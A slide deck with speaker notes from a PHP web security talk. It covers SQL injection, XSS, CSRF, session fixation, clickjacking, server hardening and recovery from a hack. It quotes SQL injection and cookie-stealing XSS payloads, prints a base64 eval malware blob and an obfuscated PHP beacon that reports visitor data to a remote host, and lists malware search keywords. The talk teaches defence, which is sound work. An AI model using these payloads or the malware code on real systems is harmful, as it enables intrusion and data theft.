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Wim Godden Solutions
My app is secure...
I think
Who am I ?
Wim Godden (@wimgtr)
Where I'm from
Where I'm from
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Belgium – the traffic
Who am I ?
Wim Godden (@wimgtr)
Founder of Solutions (
Open Source developer since 1997
Developer of PHPCompatibility, OpenX, ...
Speaker at PHP and Open Source conferences
Who are you ?
Developers ?
System engineers ?
Network engineers ?
Ever had a hack ?
Through the code ?
Through the server ?
This talk
Based on 2-day training
Full stack → no Vagrant/VirtualBox required
Lots of links at the end → slides on
Code samples in PHP
→ no worries, works the same in other languages
My app is secure... I think
Basic stuff = known...
… or is it ?
Code is not enough
Database server
Operating system
Do not use these techniques to hack
Use the knowledge to prevent others from hacking you
Reasons for hackers to hack
Steal and sell your data
Use your infrastructure as a jumpstation to hack other servers
Send out lots of spam
Use your server in a botnet for DDOS attacks
Bring down your systems
Part 1 : the most common attacks
Open Web Application Security Project
Top 10
SQL Injection (OWASP #1)
Over 15 years
Still #1 problem
SQL Injection (OWASP #1)
MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database.");
@mysql_select_db("$dbName") or die("Unable to select database.");
while (!feof($fp))
$res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']);
for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++)
print $content;
SQL Injection (OWASP #1)
Over 15 years
Still #1 problem
Easy to exploit
Easy to automate (scan + exploit)
Standard SQL injection example
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
' OR '1'='1
select * from user where email='' OR '1'='1'
E-mail :
Standard SQL injection example
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
' OR '1'='1
select * from user where '1'='1'
E-mail :
Standard SQL injection example
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
' OR '1'='1
select * from user;
E-mail :
Hackers just want your data
select * from user where email='' OR '1'='1' limit 2, 1; --';
select * from user where email='' OR '1'='1' limit 3, 1; --';
select * from user where email='' OR '1'='1' limit 4, 1; --';
' OR '1'='1' limit 2, 1; –';E-mail :
SQL Injection – much more...
Much more than logging in as a user
SQL injection possible → wide range of dangers
Fixing SQL injection : attempt #1
Addslashes() ?
$query = mysql_query('select * from user where id=' . addslashes($_GET['id']));
select * from user where id=5 and sleep(10)
What if we hit that code 100 times simultaneously ?
MySQL max_connections reached → Server unavailable
Fixing SQL injection : attempt #2
Fixing SQL injection : use prepared statements
$select = 'select * from user where email = :email';
$stmt = $db->prepare($select);
$stmt->bindParam(':email', $_GET['email']);
$results = $stmt->fetchAll();
ORM tools
When using their query language → OK
Beware : you can still execute raw SQL !
Other injections
LDAP injection
Command injection (system, exec, ...)
Eval (waaaaaaaaaah !)
User input → Your application → External system
If you provide the data, it's your responsibility !
If you consume the data, it's your responsibility !
Bobby Tables
Session fixation
<a href=””>Verify your account</a>
Session fixation
Create evil PHP code
Session cookie on
Use evil session cookie
<a href=””>Verify your account</a>
Session hijacking
Ways to avoid session fixation/hijacking
session.use_trans_sid = 0
session.use_only_cookies = true
session.cookie_httponly = true
Change session on login using session_regenerate_id(true)
Do not share sessions between sites/subdomains
Do not accept sessions not generated by your code
Foreign session → remove the session cookie from the user
Regenerate session regularly using session_regenerate_id(true)
session.cookie_secure = true
All of the above help against session fixation AND session
hijacking !
XSS – Cross Site Scripting
addMessage($_GET['id'], $_GET['message']);
echo 'Thank you for submitting your message : ' . $_GET['message'];
URL : /submitMessage<script>alert('Fun eh ?')</script>
XSS – more advanced, we will be in
touch soon.<script type="text/javascript" src="
XSS – Advanced, yet simple
<img src=x onerror=this.src='
XSS : Non-persisted vs persistent
Previous examples were non-persistent : issue occurs once
Post code to exploitable bulletin board
→ Persistent
→ Can infect every user
→ If you stored it without filtering, you're responsible for escaping on
output !
XSS : how to avoid
Filter input, escape output
echo 'I just submitted this message : ' .
htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
CSRF : Cross Site Request Forgery
Submit article
for review
Retrieve articlefor review
Evil html or jsmakes call
Devil uses extra
Here's the article you were asking for.
<img src=”” />
CSRF : ways to avoid
Escape the output (where did we hear that before ?)
Add a field to forms with a random hash/token for verification
upon submit
Check the referer header
→ Easy to fake
<form method="post" action="userSave.php">
<input name="id" type="hidden" value="5" />
<input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" />
rest of the form
General rules – input validation
Assume all data you receive as input
contains a hack attempt !
That includes data from trusted users
→ over 90% of hacks are done by employees/partners/...
Filter on disallowed characters
Check validity of
Email addresses
Input validation is not browser-side code, it's server-side code
(you can ofcourse use browser-side code to make it look good)
General rules – validation or filtering ?
Validation :
Verify if the values fit a defined format
Examples :
expecting int, but received 7.8 → “error, 7.8 is not a valid integer”
expecting international phone number, but received “+32 3 844 71 89”
Filtering / sanitizing :
Enforce the defined format by converting to it
Examples :
expecting int, but received 7.8 → 8
expecting int, but received 'one' → 0
expecting international phone number, but received “+32 3 844 71 89” → “+3238447189”
Both have (dis)advantages
General rules – escaping output
Doing input validation → why do you need output escaping ?
What if the data originates from
a webservice
an XML feed
Always escape output !
Do you want to
our cause ?
Do you want to
delete all your
friends ?
Yes No
FB button
iframe { /* iframe from */
top:0; left:0;
Clickjacking - solutions
Sending X-Frame-Options header :
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
Sending frame-ancestor directive :
Content-Security-Policy: frame-ancestors 'none'
Content-Security-Policy: frame-ancestors 'self'
Content-Security-Policy: frame-ancestors
Jump out of iframe (use Framekiller)
Bad authentication / authorization layer
(checks cookie)
(sets cookie)
to login
to main
Bad authentication / authorization layer
(checks cookie)
(sets cookie)
to login
(doesn't check
cookie !)
to main
Bad authentication / authorization layer
Only hiding URLs on view, not restricting on action
/somewhere is visible on screen
/somewhere/admin is not visible, but is accessible
Allowing direct access to other user's data
/user/profile/id/311 is the user's profile
/user/profile/id/312 is also accessible and updateable
Allowing direct access to file downloads with guessable urls
Creating cookies :
Protecting your web stack
Application language
Database server
Mail server
Other servers
Protecting your web stack – Passwords
Don't use MD5 or SHA1 → sha512, blowfish, …
Set a good password policy
Min 8 chars, min 1 number, min 1 uppercase char, …
NO maximum length
Try to avoid password hints
→ Email link is better for recovery
Don't create your own password hashing algorithm !
Use password_hash()
5.5+ : built-in
< 5.5 : ircmaxell/password-compat
Protecting your web stack – Webserver
Block direct access to upload directories
Access to private files, uploads, ...
Protecting your web stack – Webserver
Block direct access to upload directories
Allow only access to port 80 and 443 (!)
Disable phpMyAdmin (VPN only if required)
On Apache don't :
AllowOverride All
Options Indexes
Block access to .svn and .git
Protecting your web stack – Webserver
Protecting your web stack – Database server
No access from the web required
Give it a private IP
Other websites on network ?
→ send traffic over SSL
Protecting your web stack
Use public/private key pairs for SSH, not passwords
Don't login as root
→ Use sudo for commands that really need it
Allow SSH access only from VPN
Memcached ?
Gearman ?
… ?
→ Block external access
Protecting your web stack - firewalls
Separate or on-server
Default policy = deny all
Don't forget IPv6 !!!
First action of a hacker
Make sure they don't lose the access they gained
Create new user → easy to detect
Install a custom backdoor
→ easy to detect with good IDS
Install a backdoor based on installed software
→ Example : start SSHD with different config on different port (remember firewall ?)
→ Harder to detect
→ Kill it... what happens ?
→ Probably restarts via cronjob
Using an Intrusion Detection System
Host-based Intrusion Detection System (HIDS)
Network-based Intrusion Detection System (NIDS)
One IDS distro to rule them all
Security Onion
Based on Ubuntu
Contains all the IDS tools...
...and much more
You've been hacked ! Now what ? (1/4)
Take your application offline
→ Put up a maintenance page (on a different server)
Take the server off the public Internet
Change your SSH keys
Make a full backup
Check for cronjobs
Check access/error/... logs
(And give them to legal department)
Were any commits made from the server ?
→ Your server shouldn't be able to !
What a hack might look like
What a hack might look like
What a hack might look like
function _1618533527($i)
return '';
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
return $a[$i];
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .
$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)])
._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt',
'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
return 'curl_version';
You've been hacked ! Now what ? (2/4)
Search system
Search system and database
You've been hacked ! Now what ? (3/4)
Find out how the hack happened ;-)
Write an apology to your customers
Finally :
Reinstall the OS (from scratch !)
Update all packages to the latest version
Don't reinstall code from backup !
Install source code from versioning system
Restore DB from previous backup (use binary log file)
Restoring your database to a specific point
Turn on binary log
Usually for master-slave replication
Useful for fast recovery
Make sure it can handle >24h of data
Make a daily database backup
Make a db dump to a file (mysqldump, …)
Warning : locking danger → do this on the slave !
Backup the db dump file
To recover :
Restore the db dump file
Replay binary log (mysqlbinlog …)
You've been hacked ! Now what ? (4/4)
Install IDS
Get an external security audit on the code
Get an external security audit on the system/network setup
Change user passwords
Cross your fingers
Think like a hacker
Can I steal data ? Can I DOS the site ?
Which techniques could I use to do it ?
Try it without looking at the code
Try it while looking at the code
Use SSL/HTTPS everywhere !
Block all traffic, then allow only what's needed
Sanitize/filter your input
Escape your output
Use an IDS
Never trust a hacked system
Questions ?
Questions ?
The software discussed (and more)
General resources
SecurityFocus :
SecTools :
SQL injection
Havij (automated tool) – beware : might be infected !!!!!!!!
Clickjacking demo :
Password use in PHP
5.5+ : password_hash function :
< 5.5 : password_compat :
The software discussed (and more)
SSL certificates
RapidSSL FreeSSL :
Let's Encrypt (coming soon) :
StartSSL :
Block access to .svn and .git :
Webserver flood/scan detection
Nginx :
Multi-webserver :
Proxy-based :
The software discussed (and more)
Protecting your mail server
SPF and DomainKeys :
Hijacking :
Spoofing :
IPv6 – don't forget to firewall it the same way :
Automatic scanning tools :
Nessus :
Wapiti :
Nexpose :
The software discussed (and more)
Slow HTTP DOS attacks :
Exposé :
Samhain :
Snort :
Sirucata :
All in one : Security Onion :
The software discussed (and more)
Penetration testing live CD :
Backtrack Linux :
Kali Linux :
In case you're interested
Tutorial : 2,5h - 3h
Training : 2 days
1,5 days of interactive training (partly slides, partly hands-on)
Try out different security issues
Experiment on local virtualboxes and physical machines we bring along
0,5 day of auditing
Your code
Your servers
Your network
As a global team effort or in smaller teams
More details :
Thanks !
Twitter @wimgtr

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My app is secure... I think

  • 1. Wim Godden Solutions My app is secure... I think
  • 2. Who am I ? Wim Godden (@wimgtr)
  • 9. Belgium – the traffic
  • 10. Who am I ? Wim Godden (@wimgtr) Founder of Solutions ( Open Source developer since 1997 Developer of PHPCompatibility, OpenX, ... Speaker at PHP and Open Source conferences
  • 11. Who are you ? Developers ? System engineers ? Network engineers ? Ever had a hack ? Through the code ? Through the server ?
  • 12. This talk Based on 2-day training Full stack → no Vagrant/VirtualBox required Lots of links at the end → slides on Code samples in PHP → no worries, works the same in other languages
  • 13. My app is secure... I think Basic stuff = known... … or is it ? Code is not enough Code Webserver Database server Operating system Network
  • 14. Disclaimer Do not use these techniques to hack Use the knowledge to prevent others from hacking you
  • 15. Reasons for hackers to hack Steal and sell your data Use your infrastructure as a jumpstation to hack other servers Send out lots of spam Use your server in a botnet for DDOS attacks Bring down your systems …
  • 16. Part 1 : the most common attacks
  • 17. OWASP Open Web Application Security Project Top 10
  • 18. SQL Injection (OWASP #1) Over 15 years Still #1 problem
  • 19. SQL Injection (OWASP #1) <? require("header.php"); $hostname="localhost"; $sqlusername="someuser"; $sqlpassword="somepass"; $dbName="somedb"; MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database."); @mysql_select_db("$dbName") or die("Unable to select database."); $fp=fopen("content/whatever.php","r"); while (!feof($fp)) $content.=fgets($fp,2); $res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']); for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++) { $lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n"; } $content=str_replace("<@textstring@>",$lst,$content); print $content; require("footer.php"); ?>
  • 20. SQL Injection (OWASP #1) Over 15 years Still #1 problem Easy to exploit Easy to automate (scan + exploit)
  • 21. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user where email='' OR '1'='1' E-mail :
  • 22. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user where '1'='1' E-mail :
  • 23. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user; E-mail :
  • 24. Hackers just want your data select * from user where email='' OR '1'='1' limit 2, 1; --'; select * from user where email='' OR '1'='1' limit 3, 1; --'; select * from user where email='' OR '1'='1' limit 4, 1; --'; ... ' OR '1'='1' limit 2, 1; –';E-mail :
  • 25. SQL Injection – much more... Much more than logging in as a user SQL injection possible → wide range of dangers
  • 26. Fixing SQL injection : attempt #1 Addslashes() ? $query = mysql_query('select * from user where id=' . addslashes($_GET['id'])); select * from user where id=5 and sleep(10) What if we hit that code 100 times simultaneously ? MySQL max_connections reached → Server unavailable
  • 27. Fixing SQL injection : attempt #2 mysql_real_escape_string() mysqli_real_escape_string() pg_escape_string() ...
  • 28. Fixing SQL injection : use prepared statements $select = 'select * from user where email = :email'; $stmt = $db->prepare($select); $stmt->bindParam(':email', $_GET['email']); $stmt->execute(); $results = $stmt->fetchAll();
  • 29. ORM tools When using their query language → OK Beware : you can still execute raw SQL !
  • 30. Other injections LDAP injection Command injection (system, exec, ...) Eval (waaaaaaaaaah !) … User input → Your application → External system If you provide the data, it's your responsibility ! If you consume the data, it's your responsibility !
  • 33. Session fixation 1 Create evil PHP code 4 Session cookie on + redirect 2 3 5 Login6 Use evil session cookie <html> … <a href=””>Verify your account</a> … </html>
  • 35. Ways to avoid session fixation/hijacking session.use_trans_sid = 0 session.use_only_cookies = true session.cookie_httponly = true Change session on login using session_regenerate_id(true) Do not share sessions between sites/subdomains Do not accept sessions not generated by your code Foreign session → remove the session cookie from the user Regenerate session regularly using session_regenerate_id(true) Use HTTPS session.cookie_secure = true All of the above help against session fixation AND session hijacking !
  • 36. XSS – Cross Site Scripting <?php addMessage($_GET['id'], $_GET['message']); echo 'Thank you for submitting your message : ' . $_GET['message']; URL : /submitMessage<script>alert('Fun eh ?')</script>
  • 37. XSS – more advanced, we will be in touch soon.<script type="text/javascript" src=" cookie.js"></script>
  • 38. XSS – Advanced, yet simple <img src=x onerror=this.src=' here.php?c='+document.cookie> %2C+we+will+be+in+touch+soon.%3Cimg+src%3Dx+onerror%3Dthis.src%3D %27%2Bdocument.cookie%3E%0D%0A
  • 39. XSS : Non-persisted vs persistent Previous examples were non-persistent : issue occurs once Post code to exploitable bulletin board → Persistent → Can infect every user → If you stored it without filtering, you're responsible for escaping on output !
  • 40. XSS : how to avoid Filter input, escape output <?php echo 'I just submitted this message : ' . htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
  • 41. CSRF : Cross Site Request Forgery 1 Submit article for review 2 Retrieve articlefor review 3 Evil html or jsmakes call 4 Devil uses extra privileges Here's the article you were asking for. <img src=”” />
  • 42. CSRF : ways to avoid Escape the output (where did we hear that before ?) Add a field to forms with a random hash/token for verification upon submit Check the referer header → Easy to fake <form method="post" action="userSave.php"> <input name="id" type="hidden" value="5" /> <input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" /> rest of the form </form>
  • 43. General rules – input validation Assume all data you receive as input contains a hack attempt ! That includes data from trusted users → over 90% of hacks are done by employees/partners/... Filter on disallowed characters Check validity of Dates Email addresses URLs etc. Input validation is not browser-side code, it's server-side code (you can ofcourse use browser-side code to make it look good)
  • 44. General rules – validation or filtering ? Validation : Verify if the values fit a defined format Examples : expecting int, but received 7.8 → “error, 7.8 is not a valid integer” expecting international phone number, but received “+32 3 844 71 89” Filtering / sanitizing : Enforce the defined format by converting to it Examples : expecting int, but received 7.8 → 8 expecting int, but received 'one' → 0 expecting international phone number, but received “+32 3 844 71 89” → “+3238447189” Both have (dis)advantages
  • 45. General rules – escaping output Doing input validation → why do you need output escaping ? What if the data originates from a webservice an XML feed … Always escape output !
  • 46. Clickjacking Do you want to support our cause ? NoSure Do you want to delete all your Facebook friends ? Yes No FB button <style> iframe { /* iframe from */ width:300px; height:100px; position:absolute; top:0; left:0; filter:alpha(opacity=0); opacity:0; } </style>
  • 47. Clickjacking - solutions Sending X-Frame-Options header : X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN Sending frame-ancestor directive : Content-Security-Policy: frame-ancestors 'none' Content-Security-Policy: frame-ancestors 'self' Content-Security-Policy: frame-ancestors Jump out of iframe (use Framekiller)
  • 48. Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php redirect to main
  • 49. Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php (doesn't check cookie !) redirect to main
  • 50. Bad authentication / authorization layer Only hiding URLs on view, not restricting on action /somewhere is visible on screen /somewhere/admin is not visible, but is accessible Allowing direct access to other user's data /user/profile/id/311 is the user's profile /user/profile/id/312 is also accessible and updateable Allowing direct access to file downloads with guessable urls /download/file/83291.pdf Creating cookies : loggedin=1 userid=312 admin=1
  • 51. Protecting your web stack Application language Webserver Database server Mail server Other servers Firewalls ...
  • 52. Protecting your web stack – Passwords Don't use MD5 or SHA1 → sha512, blowfish, … Set a good password policy Min 8 chars, min 1 number, min 1 uppercase char, … NO maximum length Try to avoid password hints → Email link is better for recovery Don't create your own password hashing algorithm ! Use password_hash() 5.5+ : built-in < 5.5 : ircmaxell/password-compat
  • 53. Protecting your web stack – Webserver Block direct access to upload directories
  • 54. Access to private files, uploads, ...
  • 55. Protecting your web stack – Webserver Block direct access to upload directories Allow only access to port 80 and 443 (!) Disable phpMyAdmin (VPN only if required) On Apache don't : AllowOverride All Options Indexes Block access to .svn and .git
  • 56. Protecting your web stack – Webserver
  • 57. Protecting your web stack – Database server No access from the web required Give it a private IP Other websites on network ? → send traffic over SSL
  • 58. Protecting your web stack Use public/private key pairs for SSH, not passwords Don't login as root → Use sudo for commands that really need it Allow SSH access only from VPN Running Memcached ? Gearman ? … ? → Block external access
  • 59. Protecting your web stack - firewalls Separate or on-server Default policy = deny all Don't forget IPv6 !!!
  • 60. First action of a hacker Make sure they don't lose the access they gained Create new user → easy to detect Install a custom backdoor → easy to detect with good IDS Install a backdoor based on installed software → Example : start SSHD with different config on different port (remember firewall ?) → Harder to detect → Kill it... what happens ? → Probably restarts via cronjob
  • 61. Using an Intrusion Detection System Host-based Intrusion Detection System (HIDS) OSSEC Samhain Network-based Intrusion Detection System (NIDS) Snort Sirucata
  • 62. One IDS distro to rule them all Security Onion Based on Ubuntu Contains all the IDS tools... ...and much more
  • 63. You've been hacked ! Now what ? (1/4) Take your application offline → Put up a maintenance page (on a different server) Take the server off the public Internet Change your SSH keys Make a full backup Check for cronjobs Check access/error/... logs (And give them to legal department) Were any commits made from the server ? → Your server shouldn't be able to !
  • 64. What a hack might look like eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0 xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW 5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW 9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
  • 65. What a hack might look like
  • 66. What a hack might look like $GLOBALS['_226432454_']=Array(); function _1618533527($i) { return ''; } $ip=_1618533527(0); $GLOBALS['_1203443956_'] = Array('urlencode'); function _1847265367($i) { $a=Array('http://','/btt.php? ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER'); return $a[$i]; } $url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) . $_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)]; $GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents'); function _393632915($i) { return 'curl_version'; }
  • 67. You've been hacked ! Now what ? (2/4) Search system preg_replace base64_decode eval system exec passthru Search system and database script iframe
  • 68. You've been hacked ! Now what ? (3/4) Find out how the hack happened ;-) Write an apology to your customers Finally : Reinstall the OS (from scratch !) Update all packages to the latest version Don't reinstall code from backup ! Install source code from versioning system Restore DB from previous backup (use binary log file)
  • 69. Restoring your database to a specific point Turn on binary log Usually for master-slave replication Useful for fast recovery Make sure it can handle >24h of data Make a daily database backup Make a db dump to a file (mysqldump, …) Warning : locking danger → do this on the slave ! Backup the db dump file To recover : Restore the db dump file Replay binary log (mysqlbinlog …)
  • 70. You've been hacked ! Now what ? (4/4) Install IDS Get an external security audit on the code Get an external security audit on the system/network setup Change user passwords Relaunch Cross your fingers
  • 71. Takeaways Think like a hacker Can I steal data ? Can I DOS the site ? Which techniques could I use to do it ? Try it without looking at the code Try it while looking at the code Use SSL/HTTPS everywhere ! Block all traffic, then allow only what's needed Sanitize/filter your input Escape your output Use an IDS Never trust a hacked system
  • 74. The software discussed (and more) General resources OWASP : SANS : SecurityFocus : CERT : SecTools : SQL injection Havij (automated tool) – beware : might be infected !!!!!!!! Clickjacking demo : Password use in PHP 5.5+ : password_hash function : < 5.5 : password_compat :
  • 75. The software discussed (and more) SSL certificates RapidSSL FreeSSL : Let's Encrypt (coming soon) : StartSSL : Block access to .svn and .git : Webserver flood/scan detection Nginx : Multi-webserver : Proxy-based :
  • 76. The software discussed (and more) Protecting your mail server SPF and DomainKeys : DNS Hijacking : Spoofing : IPv6 – don't forget to firewall it the same way : Automatic scanning tools : Nessus : Wapiti : Nexpose :
  • 77. The software discussed (and more) Slow HTTP DOS attacks : IDS PHP PHPIDS : Exposé : Host-based OSSEC : Samhain : AIDE : Network-based Snort : Sirucata : All in one : Security Onion :
  • 78. The software discussed (and more) Penetration testing live CD : Backtrack Linux : Kali Linux :
  • 79. In case you're interested Tutorial : 2,5h - 3h Training : 2 days 1,5 days of interactive training (partly slides, partly hands-on) Try out different security issues Experiment on local virtualboxes and physical machines we bring along 0,5 day of auditing Your code Your servers Your network As a global team effort or in smaller teams More details :
  • 80. Thanks ! Twitter @wimgtr Slides E-mail

Editor's Notes

  1. This morning we&amp;apos;re going to talk about security. This tutorial is based on a 2day training that we offer. Training → exercises with Vagrant/Virtualbox Only 3h → too short to try everything → usually takes 30min before everyone&amp;apos;s ready We have a lot of ground to cover, because...
  2. Tutorial is titled... devs know basic security no-nos often unaware of less-common issues More importantly : creating secure app = more than creating secure code. Web app = chain of software and hardware Every part of chain = equally important. Neglecting single component → app and data at risk So next 3h → code and how to secure it Also security of web stack. Detect hack attempt, again both in code and stack Techniques to make it harder to go unnoticed
  3. Before we begin : Little disclaimer Looking at techniques hackers use Not promoting techniques Explaining to help you understand there&amp;apos;s lot more than meets the eye. Use knowledge to improve security, not exploit bad code
  4. …. That&amp;apos;s the reason to spend a little time explaining why there&amp;apos;s so much more to SQL injection than what most people think or talk about in talks
  5. …. That&amp;apos;s the reason to spend a little time explaining why there&amp;apos;s so much more to SQL injection than what most people think or talk about in talks
  6. …. That&amp;apos;s the reason to spend a little time explaining why there&amp;apos;s so much more to SQL injection than what most people think or talk about in talks
  7. As already mentioned : hackers want your data Easy way to retrieve it. Increment the limit start Retrieve each row of the table
  8. So how do we fix SQL injection ? Who has ever used addslashes to... ? How could you exploit this code ? No quotes ! We can&amp;apos;t retrieve data, but we can cause each query to sleep 10 sec. So addslashes is not a good solution
  9. The second option is the real_escape_string functions. Although they&amp;apos;re not bad → not really ideal anymore
  10. Best way : prepared statements They&amp;apos;re the most convenient and flexible way to protect against all the things we just saw.
  11. ORMs will help → they use prepared statements → You can still execute raw SQL → still vulnerable to SQL → be careful, even with ORM
  12. Plenty of other injections possible Rule is : don&amp;apos;t accept input from user and send it unfiltered to external system Let&amp;apos;s say SOAP webservice someone wrote years ago. Unfiltered data → SOAP → might have SQL injection issue. Not your problem ? SOAP developer gone, source code gone ? You consume service, you need to provide good data.
  13. Not as well know, but very dangerous and sneaky How it works... EXPLAIN SLIDE Ofcourse this implies passing session id in query string → Not recommended → Enable session.user_only_cookies
  14. Another common way Not passing session id on query string Works on limited sites Let&amp;apos;s say we can register subdomain and run PHP code EXPLAIN SLIDE
  15. Session fixation is serious problem Luckily few things that can be done All of tips also help in avoiding hijacking → when http traffic is intercepted → cookie gets stolen
  16. XSS problem is mostly poor output escaping This is most simple version. However, can get a lot worse.
  17. Non-persistent : targeted to one user at a time Persistent : can infect every usre
  18. There&amp;apos;s a few